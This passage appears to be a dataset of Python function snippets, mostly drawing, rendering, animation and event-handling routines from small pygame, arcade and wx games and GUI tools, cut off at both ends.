tick,\n\t\t\t\t\t\t\t\t\t\t\t\tself._direction == Character.LEFT)\n\t\tif Character.DEBUG:\n\t\t\tmove = camera[:]\n\t\t\tmove[0] *= -1\n\t\t\tmove[1] *= -1\n\t\t\tpygame.draw.rect(surface, (255, 255, 255), self._collision_rect.move(move), 2)\n\t\t\tpygame.draw.rect(surface, (255, 0, 0), self._top_rect.move(move), 1)\n\t\t\tpygame.draw.rect(surface, (255, 0, 0), self._bottom_rect.move(move), 1)\n\t\t\tpygame.draw.rect(surface, (0, 0, 255), self._left_rect.move(move), 1)\n\t\t\tpygame.draw.rect(surface, (0, 0, 255), self._right_rect.move(move), 1)", "def _animation_over(self) -> bool:\n \treturn self.current_height == 0 or self.current_height == self.original_height", "def is_animation_running(self):\n return self._run_animation", "def draw(self):\n self.batch.draw()", "def on_draw(self):\n # draw everything", "def tick(self):\n # detect pressed keys\n if not self.handle_events():\n return False\n # redraw\n if self.pause:\n return True\n self.phy.tick()\n color = 0\n self.screen.fill((0, 0, 0))\n new_image = pygame.Surface(self.screen.get_size()).convert()\n for p in self.phy.objects:\n self.put_object(new_image, p, COLORS[color])\n color = (color + 1) % len(COLORS)\n self.screen.blit(new_image, (0, 0))\n color = 0\n for p in self.phy.objects:\n text = \"%.2E\" % (int(p.mass))\n self.put_text(\n text,\n COLORS[color], (\n int(p.position[0] / SCALE_FACTOR) - len(text) * 5,\n int(p.position[1] / SCALE_FACTOR + int(p.radius) / SCALE_FACTOR * 1.2)\n )\n )\n color = (color + 1) % len(COLORS)\n self.show_status()\n pygame.display.set_icon(self.surficon)\n pygame.display.flip()\n return True", "def draw(self):\n with self:\n self.batch.draw()", "def draw(self):\n self.write_image()\n self.update()", "def draw(self):\n i = 0\n self.window.fill((60,50,20))\n for i in range(len(self.board)):\n for j in range(len(self.board[i])):\n pygame.draw.rect(self.window, ((i+j)%2*255, (i+j)%2*255, (i+j)%2*255), (20+j*100, 20+i*100, 100, 100))\n if self.board[i][j] != 0:\n if self.board[i][j].player == 0:\n color = (200, 0, 0)\n else:\n color = (0, 0, 200)\n if self.board[i][j].direction == 0:\n pygame.draw.ellipse(self.window, color, (30+j*100, 40+i*100, 80, 60))\n elif self.board[i][j].direction == 1:\n pygame.draw.ellipse(self.window, color, (40+j*100, 30+i*100, 60, 80))\n if self.board[i][j].master:\n if self.board[i][j].direction == 0:\n pygame.draw.ellipse(self.window, (255,255,0), (40+j*100, 50+i*100, 60, 40))\n pygame.draw.ellipse(self.window, color, (45+j*100, 55+i*100, 50, 30))\n elif self.board[i][j].direction == 1:\n pygame.draw.ellipse(self.window, (255,255,0), (50+j*100, 40+i*100, 40, 60))\n pygame.draw.ellipse(self.window, color, (55+j*100, 45+i*100, 30, 50))\n \n if self.selected != None:\n pygame.draw.rect(self.window, (200, 200, 0), (20+self.selected[1]*100, 20+self.selected[0]*100, 100, 100), 5)\n pygame.display.flip()", "def update(self, screen) -> bool:\n # Current animation frame is less than 10\n if self.curr_frame < 10:\n exp = pygame.image.load(\"images/exp\" + str(self.curr_frame) + \".png\").convert_alpha()\n exp = pygame.transform.scale(exp, (self.width, self.height))\n screen.blit(exp, (self.x, self.y))\n return True\n # Current animation frame is greater/equal to 10\n else:\n self.curr_frame = 1\n return False", "def do_paint(self):\r\n curses.curs_set(0)\r\n if self.win:\r\n self.paint()\r\n self.done_paint()", "def draw():\n background(255)\n for i in range(COLS):\n for j in range(ROWS):\n if (BOARD[i][j] == 1): fill(0)\n else: fill(255)\n noStroke() # stroke(0)\n rect(i * CELL_SIZE, j * CELL_SIZE, CELL_SIZE, CELL_SIZE)\n if (PLAY):\n generate()", "def _onPaint(self, evt):\n if not self._isRealized:\n self.realize()\n if self._drawn < 2:\n self.draw(repaint = False)\n self._drawn += 1\n self.gui_repaint(drawDC=wx.PaintDC(self))", "def draw (self):\n screen = self.screen\n dirty = False\n for z, displays in self.layers.iteritems():\n for display in displays:\n drew = display.draw(screen)\n # if made changes to the surface\n if drew:\n # set any displays that overlap this one dirty\n for d in display.overlapped:\n d.dirty = True\n dirty |= drew\n return dirty", "def draw(self):\n return self._myCanvas.draw()", "def draw (self):\n screen = self.screen\n dirty = False\n for display in self.displays:\n dirty |= display.draw(screen)\n return dirty", "def draw(canvas):\n\n # draw the background graphic\n canvas.draw_image(background, (150, 150), (300, 300), (150, 150), (300, 300))\n\n # draw the stopwatch text\n canvas.draw_text(time, [centre_x(time, time_font_size, font_face_all), 143], time_font_size, colour_time, font_face_all)\n\n # draw the score as 'correct guesses / total guesses'\n canvas.draw_text(score_total, [200, 40], score_message_font_size, colour_score, font_face_all)\n\n # draw the score message\n if message_displayed:\n # modulus loops all the colours in rainbow\n # colour_count incremented in message_colour_tick\n rainbow_colour = colour_count % len(rainbow)\n canvas.draw_text(event_message, [message_x, 70], message_event_font_size, rainbow[rainbow_colour], font_face_all)\n\n # draw the animated stars (two white dots)\n canvas.draw_text(\".\", [star_x, 86], 12, colour_stars, font_face_all)\n canvas.draw_text(\".\", [star_x, 165], 12, colour_stars, font_face_all)\n\n # draw the achievement badges\n if my_score >= 5:\n canvas.draw_image(cheevo5, (10, 10), (21, 20), (12, 31), (21, 20))\n if my_score >= 10:\n canvas.draw_image(cheevo10, (10, 10), (21, 20), (35, 31), (21, 20))\n if my_score >= 25:\n canvas.draw_image(cheevo25, (10, 10), (21, 20), (58, 31), (21, 20))\n if my_score >= 50:\n canvas.draw_image(cheevo50, (10, 10), (21, 20), (81, 31), (21, 20))\n if my_score >= 100:\n canvas.draw_image(cheevo100, (10, 10), (21, 20), (104, 31), (21, 20))\n\n # draw the score streak counters\n canvas.draw_text(\"Current Streak:\", [30, 180], score_streak_font_size, colour_streak, font_face_all)\n canvas.draw_text(str(current_streak), [125, 180], score_streak_font_size, colour_streak, font_face_all)\n canvas.draw_text(\"Best Streak:\", [170, 180], score_streak_font_size, colour_streak, font_face_all)\n canvas.draw_text(str(best_streak), [247, 180], score_streak_font_size, colour_streak, font_face_all)", "def draw(self, *args, **kwargs):\n self.window.clear()\n self.batch.draw()", "def can_draw(self,point):\n if point <= 0:\n return False\n else:\n return True", "def main(self):\n\t\t\tfactor = 0.0\n\t\t\tif self.time.time() > (self.startTime + self.showTime + self.displayTime + self.hideTime):\n\t\t\t\tself.end()\n\t\t\telif self.time.time() > (self.startTime + self.showTime + self.displayTime):\n\t\t\t\t#Hide animation will occur here.\n\t\t\t\tfactor = (self.hideTime - (self.time.time() - (self.startTime + self.showTime + self.displayTime))) / self.hideTime\n\t\t\t\tself.frame.colors = [(0.2, 0.2, 0.2, (0.8 * factor)) for i in range(4)]\n\t\t\t\tself.frame._update_position(self.frame._base_size, [0.7, (1.0 - (0.2 * factor))])\n\t\t\t\tself.display._update_position(self.display._base_size, self.display._base_pos)\n\t\t\t\tself.display.text = self.text\n\t\t\t\n\t\t\telif self.time.time() > (self.startTime + self.showTime):\n\t\t\t\tif self.frame._base_pos != [0.7, 0.8]:\n\t\t\t\t\tself.frame._update_position(self.frame._base_size, [0.7, 0.8])\n\t\t\t\t\tself.display._update_position(self.display._base_size, self.display._base_pos)\n\t\t\t\t\tself.display.text = self.text\n\t\t\t\n\t\t\telse:\n\t\t\t\t#play show animation.\n\t\t\t\tfactor = (self.time.time() - self.startTime) / self.showTime\n\t\t\t\tself.frame.colors = [(0.2, 0.2, 0.2, (0.8 * factor)) for i in range(4)]\n\t\t\t\tself.frame._update_position(self.frame._base_size, [0.7, (1.0 - (0.2 * factor))])\n\t\t\t\tself.display._update_position(self.display._base_size, self.display._base_pos)\n\t\t\t\tself.display.text = self.text", "def paint(self):\r\n pass", "def requires_rendering(self, skip_bool_switch=False):\n if self.sorting_active: \n # This is to ensure the last frame when the thread is complete is still rendered\n if (not skip_bool_switch):\n self.sorting_active = self.thread.is_alive()\n return True\n else:\n return False", "def drawCells(self):\r\n self.drawing = not self.drawing\r\n if self.drawing:\r\n self.draw_button['text'] = \"No Draw\"\r\n else:\r\n self.draw_button['text'] = \"Draw\"", "def on_draw_over_image(self):", "def on_draw(self):\n arcade.start_render()", "def run(self, reset=False):\n if reset:\n self.m_btn_pause = False\n self.m_current_index = 0\n self.m_history_shapes.clear()\n\n if self.m_stop:\n self.m_stop = False\n return\n\n if not self.m_btn_pause and not self.m_scl_pause:\n if 0 <= self.m_current_index < len(self.m_history) and self.m_animation_speed > 0:\n self.render()\n self.m_current_index += 1\n elif 0 < self.m_current_index <= len(self.m_history) and self.m_animation_speed < 0:\n self.m_canvas.delete(self.m_history_shapes.pop())\n self.m_current_index -= 1\n self.update_info()\n\n self.m_canvas.after(abs(self.m_animation_speed), self.run)", "def draw_frame(self):\n self.render_surface.fill((135, 206, 235))\n # self.render_surface.fill((33, 38, 63))\n self.render_surface.blit(\n self.moon,\n (self.RENDER_SURFACE_WIDTH - 150, 80),\n special_flags=pygame.BLEND_ADD,\n )\n\n # draw background\n self.draw_background()\n\n self.render_surface.blit(\n self.assets.get_character_image(self.player),\n self.camera.translate(self.player.rect),\n )\n\n for enemy in self.enemies:\n pygame.draw.rect(\n self.render_surface, enemy.color, self.camera.translate(enemy.rect)\n )\n self.draw_enemy_health(enemy)\n\n # code to mask perticular block type.\n # for i in self.chunked_map.get_blocks():\n # if i.block_type == 4:\n # pygame.draw.rect(\n # self.render_surface, (255, 255, 255), self.camera.translate(i.rect)\n # )\n\n # draw tiles\n tiles = filter(\n lambda tile: not isinstance(tile, Reward) or tile.is_valid,\n self.chunked_map.get_blocks(),\n )\n tiles = map(self.get_tile_blit_seq, tiles)\n self.render_surface.blits(tiles)\n\n # draw particles\n for particle in self.particle_system.get_active_particles():\n pygame.draw.circle(\n self.render_surface,\n particle.color,\n self.camera.translate_xy(particle.center),\n particle.radius,\n )\n\n # self.draw_fps()\n # self.draw_score()\n self.draw_player_health()\n if self.player.attack_arc_end_deg != 300:\n self.draw_attack_arc(self.player)\n\n for enemy in filter(lambda e: e.attack_arc_end_deg != 300, self.enemies):\n self.draw_attack_arc(enemy)\n\n if not self.player.read_to_take_damage:\n red_s = pygame.Surface(\n (self.RENDER_SURFACE_WIDTH, self.RENDER_SURFACE_HEIGHT)\n )\n red_s.fill((100, 0, 0))\n self.render_surface.blit(red_s, (0, 0), special_flags=pygame.BLEND_ADD)", "def _redraw(self, render_as_done: \"bool\" = False) -> \"None\":\n if not self.drawn:\n cast(\"Application\", super())._redraw(render_as_done=True)\n self.drawn = True", "def run(self):\n while True:\n if self.game_over: \n return \n\n self.handle_events() \n if self.paused:\n continue\n\n self.update_generation()\n self.draw_grid()\n\n self.cap_frame_rate()", "def on_draw(delta_time):\n # draws all our objects\n arcade.start_render()\n\n generate_grid()\n apple()\n snake(on_draw.snake_part_x, on_draw.snake_part_y, 20, 20, snake_color)\n snake(on_draw.snake_part2_x, on_draw.snake_part2_y, 20, 20, snake_color)\n snake(on_draw.snake_part3_x, on_draw.snake_part3_y, 20, 20, snake_color)\n snake(on_draw.snake_part4_x, on_draw.snake_part4_y, 20, 20, snake_color)\n snake(on_draw.snake_part5_x, on_draw.snake_part5_y, 20, 20, snake_color)\n snake(on_draw.snake_part6_x, on_draw.snake_part6_y, 20, 20, snake_color)\n\n\n if on_draw.snake_part_x <= 230:\n snake(on_draw.snake_part6_x + 20, on_draw.snake_part6_y, 20, 20, snake_color)\n\n\n \"\"\" If statements that will make snake part one move \"\"\"\n if on_draw.snake_part_x >= 550:\n on_draw.snake_part_x -= 20\n\n elif on_draw.snake_part_x <= 550:\n on_draw.snake_part_y += 20\n if on_draw.snake_part_y >= 500:\n on_draw.snake_part_y -= 20\n on_draw.snake_part_x -= 20\n if on_draw.snake_part_x <= 180:\n on_draw.snake_part_x += 20\n\n \"\"\" If statements that will make snake part two move \"\"\"\n if on_draw.snake_part2_x >= 550:\n on_draw.snake_part2_x -= 20\n\n elif on_draw.snake_part2_x <= 550:\n on_draw.snake_part2_y += 20\n if on_draw.snake_part2_y >= 500:\n on_draw.snake_part2_y -= 20\n on_draw.snake_part2_x -= 20\n if on_draw.snake_part2_x <= 200:\n on_draw.snake_part2_x += 20\n\n \"\"\" If statements that will make snake part three move \"\"\"\n if on_draw.snake_part3_x >= 550:\n on_draw.snake_part3_x -= 20\n\n elif on_draw.snake_part3_x <= 550:\n on_draw.snake_part3_y += 20\n if on_draw.snake_part3_y >= 500:\n on_draw.snake_part3_y -= 20\n on_draw.snake_part3_x -= 20\n if on_draw.snake_part3_x <= 220:\n on_draw.snake_part3_x += 20\n\n \"\"\" If statements that will make snake part four move \"\"\"\n if on_draw.snake_part4_x >= 550:\n on_draw.snake_part4_x -= 20\n\n elif on_draw.snake_part4_x <= 550:\n on_draw.snake_part4_y += 20\n if on_draw.snake_part4_y >= 500:\n on_draw.snake_part4_y -= 20\n on_draw.snake_part4_x -= 20\n if on_draw.snake_part4_x <= 240:\n on_draw.snake_part4_x += 20\n\n \"\"\" If statements that will make snake part five move \"\"\"\n if on_draw.snake_part5_x >= 550:\n on_draw.snake_part5_x -= 20\n\n elif on_draw.snake_part5_x <= 550:\n on_draw.snake_part5_y += 20\n if on_draw.snake_part5_y >= 500:\n on_draw.snake_part5_y -= 20\n on_draw.snake_part5_x -= 20\n if on_draw.snake_part5_x <= 260:\n on_draw.snake_part5_x += 20\n\n \"\"\" If statements that will make snake part six move \"\"\"\n if on_draw.snake_part6_x >= 550:\n on_draw.snake_part6_x -= 20\n\n elif on_draw.snake_part6_x <= 550:\n on_draw.snake_part6_y += 20\n if on_draw.snake_part6_y >= 500:\n on_draw.snake_part6_y -= 20\n on_draw.snake_part6_x -= 20\n if on_draw.snake_part6_x <= 280:\n on_draw.snake_part6_x += 20", "def isOnCanvas(self, x, y):\n return 0 <= x < self.width and 0 <= y < self.height", "def draw(self) -> Any:", "def on_draw(self):\n\n # Clear the screen and start drawing\n arcade.start_render()\n\n # Draw the rectangles\n for shape in self.shapes:\n shape.draw()", "def TestAnimation(self,event=None):\n wx.GetApp().Yield(True)\n Range = (-10,10)\n self.Range = Range\n\n self.UnBindAllMouseEvents()\n Canvas = self.Canvas\n Canvas.InitAll()\n\n ## Random tests of everything:\n colors = self.colors\n # Rectangles\n for i in range(3):\n xy = (random.uniform(Range[0],Range[1]), random.uniform(Range[0],Range[1]))\n lw = random.randint(1,5)\n cf = random.randint(0,len(colors)-1)\n wh = (random.randint(1,5), random.randint(1,5) )\n Canvas.AddRectangle(xy, wh, LineWidth = lw, FillColor = colors[cf])\n\n # Ellipses\n for i in range(3):\n xy = (random.uniform(Range[0],Range[1]), random.uniform(Range[0],Range[1]))\n lw = random.randint(1,5)\n cf = random.randint(0,len(colors)-1)\n wh = (random.randint(1,5), random.randint(1,5) )\n Canvas.AddEllipse(xy, wh, LineWidth = lw, FillColor = colors[cf])\n\n # Circles\n for i in range(5):\n xy = (random.uniform(Range[0],Range[1]),random.uniform(Range[0],Range[1]))\n D = random.randint(1,5)\n lw = random.randint(1,5)\n cf = random.randint(0,len(colors)-1)\n cl = random.randint(0,len(colors)-1)\n Canvas.AddCircle(xy, D, LineWidth = lw, LineColor = colors[cl], FillColor = colors[cf])\n Canvas.AddText(\"Circle # %i\"%(i), xy, Size = 12, BackgroundColor = None, Position = \"cc\")\n\n # Lines\n for i in range(5):\n points = []\n for j in range(random.randint(2,10)):\n point = (random.randint(Range[0],Range[1]),random.randint(Range[0],Range[1]))\n points.append(point)\n lw = random.randint(1,10)\n cf = random.randint(0,len(colors)-1)\n cl = random.randint(0,len(colors)-1)\n Canvas.AddLine(points, LineWidth = lw, LineColor = colors[cl])\n\n # Polygons\n for i in range(3):\n points = []\n for j in range(random.randint(2,6)):\n point = (random.uniform(Range[0],Range[1]),random.uniform(Range[0],Range[1]))\n points.append(point)\n lw = random.randint(1,6)\n cf = random.randint(0,len(colors)-1)\n cl = random.randint(0,len(colors)-1)\n Canvas.AddPolygon(points,\n LineWidth = lw,\n LineColor = colors[cl],\n FillColor = colors[cf],\n FillStyle = 'Solid')\n\n # Scaled Text\n String = \"Scaled text\"\n for i in range(3):\n ts = random.random()*3 + 0.2\n cf = random.randint(0,len(colors)-1)\n xy = (random.uniform(Range[0],Range[1]),random.uniform(Range[0],Range[1]))\n Canvas.AddScaledText(String, xy, Size = ts, Color = colors[cf], Position = \"cc\")\n\n\n # Now the Foreground Object:\n C = Canvas.AddCircle((0,0), 7, LineWidth = 2,LineColor = \"Black\",FillColor = \"Red\", InForeground = True)\n T = Canvas.AddScaledText(\"Click to Move\", (0,0), Size = 0.6, Position = 'cc', InForeground = True)\n C.Bind(FloatCanvas.EVT_FC_LEFT_DOWN, self.MoveMe)\n C.Text = T\n\n self.Timer = wx.PyTimer(self.ShowFrame)\n self.FrameDelay = 50 # milliseconds\n\n Canvas.ZoomToBB()", "def draw(self):\n self._background.draw(self.view)\n if self._state == STATE_INACTIVE:\n self._message.draw(self.view)\n if self._state == STATE_COUNTDOWN:\n self._game.draw(self.view)\n self._countdownMessage.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_ACTIVE:\n self._game.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_PAUSED:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)\n if self._state == STATE_RESET:\n self._message.draw(self.view)\n if self._state == STATE_COMPLETE:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)", "def stop_projection(self):\r\n self.paint_project_button(False)\r\n self.app.canvas.finish()", "def hitAnimation(self):\r\n self.hit.play()\r\n self.playerRect = self.player.image.get_rect()\r\n self.playerRect = (self.playerLocation[0],self.playerLocation[1],\r\n self.playerRect[2],self.playerRect[3])\r\n for i in xrange(self.maxAlpha,0,-1):\r\n for j in xrange(self.hitAnimationSpeed):\r\n self.display.fill(self.backgroundColor,self.playerRect)\r\n self.player.image.set_alpha(i)\r\n self.drawBoard()\r\n self.enemyGroup.draw(self.display)\r\n self.createCoins()\r\n self.display.blit(self.player.image, self.playerLocation)\r\n self.window.blit(self.display,(self.margin,self.margin))\r\n pygame.display.flip()", "def conditionsAreMetForDrawing(self):\n\t\tcurrentController = self.controller.view().window().windowController()\n\t\tif currentController:\n\t\t\ttool = currentController.toolDrawDelegate()\n\t\t\ttextToolIsActive = tool.isKindOfClass_( NSClassFromString(\"GlyphsToolText\") )\n\t\t\thandToolIsActive = tool.isKindOfClass_( NSClassFromString(\"GlyphsToolHand\") )\n\t\t\tif not textToolIsActive and not handToolIsActive: \n\t\t\t\treturn True\n\t\treturn False", "def save_drawing_if_necessary(self):\n\n app_doc_data = AppDocData.instance()\n if app_doc_data.activeDrawing and app_doc_data.activeDrawing.modified:\n #if QMessageBox.Yes == QMessageBox.question(self, self.tr(\"Question\"),\n # self.tr(\"Do you want to save drawing?\"),\n # QMessageBox.Yes | QMessageBox.No):\n # self.actionSaveCliked()\n # return True\n if QMessageBox.Ignore == QMessageBox.question(self, self.tr('Continue?'),\n self.tr('Changes may not have been saved.'),\n QMessageBox.Ignore | QMessageBox.Cancel):\n return False\n return True", "def draw(self, surface):\n checked_color = (0, 196, 0) if self.checked else pg.Color(\"white\")\n surface.fill(pg.Color(\"black\"), self.rect)\n surface.fill(self.color, self.rect.inflate(-2,-2))\n surface.fill(pg.Color(\"white\"), self.rect.inflate(-6,-6))\n surface.fill((205,205,205), self.rect.inflate(-8,-8))\n surface.fill(checked_color, self.select_rect)", "def draw(self, surface):\r\n if self.visible:\r\n surface.blit(self.image, (self.x, self.y))", "def OnPaint(self, event):\r\n\r\n dc = wx.AutoBufferedPaintDC(self)\r\n if self._currentImage.IsOk() and self._valid:\r\n dc.DrawBitmap(self._currentImage, 0, 0, True)\r\n else:\r\n self.Draw(dc)", "def on_draw(self):\n arcade.start_render()\n background()\n self.player_sprite.draw()", "def drawScene(background, backX, mario, marioPic, marioFrame, rectList, breakingBrick, brickPic, coins, moveCoins, coinsPic, mushrooms, itemsPic, enemiesList, enemiesPic, bullets, spriteCount, points, isMuted):\n X, Y, VX, VY, DIR, STATE = 0, 1, 2, 3, 4, 5\n ONGROUND, JUMPFRAMES, INGROUND, ISCROUCH, ONPLATFORM, ISFALLING, ISANIMATING, INVULFRAMES = 0, 1, 2, 3, 4, 5, 6, 7\n BRICKVY, IDLE, TYPE = 4, 5, 6\n ENMYVX, ENMYVY, ENMYIDLE, ENMYINFLOOR = 4, 5, 6, 7\n GUNSTATE, GUNCOUNT, GUNTYPE = 4, 5, 6\n BULLVX, BULLVY = 4, 5\n screen.fill(BLACK) # Clearing screen\n screen.blit(background, (backX, 0)) # Blitting background\n # Blitting moving coins\n for coin in moveCoins: # Going through each coin and defining rects\n coinRect = coin[0], coin[1], coin[2], coin[3]\n screen.blit(coinsPic[1][int(spriteCount // 0.4 % 4)], coinRect)\n # Blitting mushrooms\n for mushroom in mushrooms: # Going through each mushroom and defining rects\n mushRect = Rect(mushroom[0], mushroom[1], mushroom[2], mushroom[3])\n if mushroom[4] == 0: # Checkiong if the moving up animation is done\n screen.blit(itemsPic[0], mushRect)\n # Blitting enemies\n for list in enemiesList: # For each type of enemy in the enemies list\n for enemy in list: # For each individual enemy within that type\n enmyRect = Rect(enemy[0], enemy[1], enemy[2], enemy[3])\n if list == goombas:\n if enemy[ENMYIDLE] == 2: # Checking if enemy is dying\n screen.blit(enemiesPic[0][2], enmyRect)\n else: # Normal animation\n screen.blit(enemiesPic[0][int(spriteCount//6)], enmyRect)\n elif list == spinys: # Same thing as goombas except with spinys\n spinePic = enemiesPic[2][int(spriteCount// 2.4 % 2)]\n if enemy[ENMYVX] > 0: # Checking which direction the enemy is moving (1 or -1)\n spinePic = transform.flip(spinePic, True, False)\n screen.blit(spinePic, enmyRect)\n # Blitting bricks and guns\n for list in rectList: # For each type of bricks\n for brick in list: # For each individual brick within that type of brick\n brickRect = Rect(brick[0], brick[1], brick[2], brick[3]) # Defining the rect of that brick\n if list == interactBricks: # Bliting the correct picture if it is an interactBrick\n screen.blit(brickPic[1][0],brickRect)\n elif list == questionBricks: # Doing the same thing but also checking if the brick has been hit or not\n if brick[IDLE] == 1:\n screen.blit(brickPic[1][1], brickRect)\n else:\n screen.blit(brickPic[0][int(spriteCount//2)],brickRect)\n elif list == gunRects: # Bliting the pictures for the bullet bills\n if brick[GUNTYPE] == 1:\n screen.blit(enemiesPic[1][1], (brickRect.x, brickRect.y))\n elif brick[GUNTYPE] == 2:\n screen.blit(enemiesPic[1][2], (brickRect.x, brickRect.y))\n # Blitting brick debris\n for brick in breakingBrick: # For each break in all breakable bricks making the debris fall out in all 4 directions if broken\n screen.blit(brickPiece[0], (brick[0] - brick[5], brick[1]))\n screen.blit(brickPiece[1], (brick[0] + 21 + brick[5], brick[1]))\n screen.blit(brickPiece[2], (brick[0] - brick[5] / 2, brick[1] + 21))\n screen.blit(brickPiece[3], (brick[0] + 21 + brick[5] / 2, brick[1] + 21))\n # Blitting coins\n for coin in coins: # For each coin in the list of all coins\n coinRect = coin[0], coin[1], coin[2], coin[3] # Defining the coins rect\n screen.blit(coinsPic[0][int(spriteCount // 2)], coinRect) # Bliting the coins sprite\n # Blitting bullet bills\n for bullet in bullets: # going through each bullet and defining the bullets rect\n bullRect = Rect(bullet[0], bullet[1], bullet[2], bullet[3])\n bullPic = enemiesPic[1][0]\n if bullet[BULLVX] > 0:\n bullPic = transform.flip(bullPic, True, False)\n screen.blit(bullPic, bullRect)\n # Blitting flag\n screen.blit(flagPic[0],(flagInfo[0][0],flagInfo[0][1])) # Blitting pole\n screen.blit(flagPic[1],(flagInfo[1][0],flagInfo[1][1])) # Blitting flag\n # Blitting mario\n marioShow = marioPic[marioFrame[0]][int(marioFrame[1])]\n if mario[DIR] == \"Left\":\n marioShow = transform.flip(marioShow, True, False) # Flipping mario's sprite if he's facing left\n if marioStats[INVULFRAMES]%2 == 0 or marioStats[ISANIMATING]: # Checking if mario's sprite should be skipped this frame\n screen.blit(marioShow, (mario[0], mario[1])) # Blitting mario's sprite\n # Blitting floating points\n for point in points:\n pointText = marioFontThin.render(\"%s\" %point[3], False, WHITE) # Rendering the text\n screen.blit(pointText, (point[0], point[1]))\n # Blitting mute icon\n if isMuted:\n screen.blit(mutePic, (735,25))", "def is_line_busy(self) -> bool:", "def control(self):\n while not (self.game_over() or self.quit):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n self.play()\n elif event.key == pygame.K_m:\n self.__init__()\n elif event.key == pygame.K_LEFT and len(self.sequence)>=2:\n self.sequence.pop()\n self.board = self.sequence.pop()\n self.draw()\n elif event.key == pygame.K_1:\n self.tip(1)\n elif event.key == pygame.K_2:\n self.tip(2)\n elif event.key == pygame.K_3:\n self.tip(3)\n elif event.key == pygame.K_4:\n self.tip(4)\n elif event.key == pygame.K_5:\n self.tip(5)\n \n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n ## if mouse is pressed get position of cursor ##\n pos = pygame.mouse.get_pos()\n ## check if cursor is on button ##\n for i in range(len(self.buttons)):\n for j in range(len(self.buttons[i])):\n if self.buttons[i][j].collidepoint(pos):\n if self.selected == None:\n self.selected = [i,j]\n elif self.selected == [i,j]:\n self.selected = None\n elif self.board[self.selected[0]][self.selected[1]]==0:\n self.selected = [i,j]\n else:\n if self.move(i,j):\n self.selected = None\n self.draw()\n return True\n else:\n self.selected = None\n self.draw()\n return False\n self.draw()\n return False", "def draw(self):\n\n # I reset it at 24 because they're 4 images and I want the reduce the animation speed by 6 (6*4=24)\n if self.spriteCount + 1 >= 24:\n self.spriteCount = 0\n if self.isJump:\n self.screen.blit(self.spriteJump[self.spriteCount // 6], (self.x_pos, self.y_pos))\n else:\n self.screen.blit(self.spriteFall[self.spriteCount // 6], (self.x_pos, self.y_pos))\n self.spriteCount += 1", "def should_redraw_board(self):\n return True", "def begin_draw(self):\n pygame.init()\n self.display = pygame.display.set_mode(self.disp_size)\n pygame.display.set_caption('Map Editing')\n font = pygame.font.SysFont(\"arial\", 15)\n strings = [\"Press ESC to Start Drawing Obstacles\",\n \"Click Left to Draw & Right to Erase\",\n \"To finish Drawing,press Escape \",\n \"During search, Escape or Close to Quit\",\n \"you can also draw during the search, but it won't ba saved\"]\n texts = [font.render(s, True, (255, 255, 255)) for s in strings]\n for i, text in enumerate(texts):\n self.display.blit(text, (self.disp_size[0]//20, i*20+self.disp_size[1]//20))\n pygame.display.update()\n main_screen = True\n while main_screen:\n print(\"Waiting for start\")\n event = pygame.event.wait()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n main_screen = False\n self.display.fill([255, 255, 255])\n grid.draw(self.display)\n pygame.display.update()\n print(\"Now painting\")\n while True:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n break\n pos = list((np.array(pygame.mouse.get_pos())/self.block_size).astype(int))\n if pygame.mouse.get_pressed() == (1, 0, 0):\n print(\"Add wall at\", pos)\n grid[pos].type = \"WALL\"\n grid[pos].draw(self.display, self.block_size)\n elif pygame.mouse.get_pressed() == (0, 0, 1):\n print(\"remove wall from\", pos)\n grid[pos].type = \"ROAD\"\n grid[pos].draw(self.display, self.block_size)\n pygame.display.update()", "def draw(self):\n if self.state == 'alive':\n for i in range(len(self.tail)):\n pygame.draw.rect(display, black, (squareToXPix(self.tail[-(i + 1)][0], objectSize), squareToYPix(self.tail[-(i + 1)][1], objectSize), objectSize, objectSize))\n\n pygame.draw.rect(display, black, (squareToXPix(self.x, objectSize), squareToYPix(self.y, objectSize), objectSize, objectSize))\n\n else:\n for i in range(len(self.tail)):\n pygame.draw.rect(display, red, (squareToXPix(self.tail[-(i + 1)][0], objectSize), squareToYPix(self.tail[-(i + 1)][1], objectSize), objectSize, objectSize))\n\n pygame.draw.rect(display, red, (squareToXPix(self.x, objectSize), squareToYPix(self.y, objectSize), objectSize, objectSize))", "def _draw(self):\n\n pygame.draw.circle(self.display, self.colour,\n self.pos.astype(int),\n self.rad)\n pygame.draw.circle(self.display, black,\n self.pos.astype(int),\n self.rad, 2)", "def render(self, pause=0.05, frame=\"bishop\", save_frames=False):\n if self.fig == None:\n self.init_render()\n\n points1, points2 = self.get_points_on_arc(num_points=100)\n\n while self.ax.lines:\n self.ax.lines.pop() # delete previous plots\n self.ax.plot(points1[:,0], points1[:,1], points1[:,2], label=\"Segment 1\", c=\"black\", linewidth=3)\n self.ax.plot(points2[:,0], points2[:,1], points2[:,2], label=\"Segment 2\", c=\"grey\", linewidth=2)\n self.ax.plot([self.goal[0]], [self.goal[1]], [self.goal[2]], label=\"Goal\", c=\"lime\", marker=\"*\", markersize=15)\n self.ax.legend() # display legend\n\n if frame == \"bishop\":\n tangent_vec1 = self.tangent_vec_bishop1\n normal_vec1 = self.normal_vec_bishop1\n binormal_vec1 = self.binormal_vec_bishop1\n tangent_vec2 = self.tangent_vec_bishop2\n normal_vec2 = self.normal_vec_bishop2\n binormal_vec2 = self.binormal_vec_bishop2\n elif frame == \"frenet\":\n tangent_vec1 = self.tangent_vec_frenet1\n normal_vec1 = self.normal_vec_frenet1\n binormal_vec1 = self.binormal_vec_frenet1\n tangent_vec2 = self.tangent_vec_frenet2\n normal_vec2 = self.normal_vec_frenet2\n binormal_vec2 = self.binormal_vec_frenet2\n\n # add dynamic coordinate frenet frame of segment 1 tip\n while len(self.ax.artists) > 3:\n self.ax.artists.pop() # delete previous arrows, except base frame\n atangent1 = Arrow3D([self.tip_vec1[0], self.tip_vec1[0]+self.arrow_len*tangent_vec1[0]],\n [self.tip_vec1[1], self.tip_vec1[1]+self.arrow_len*tangent_vec1[1]],\n [self.tip_vec1[2], 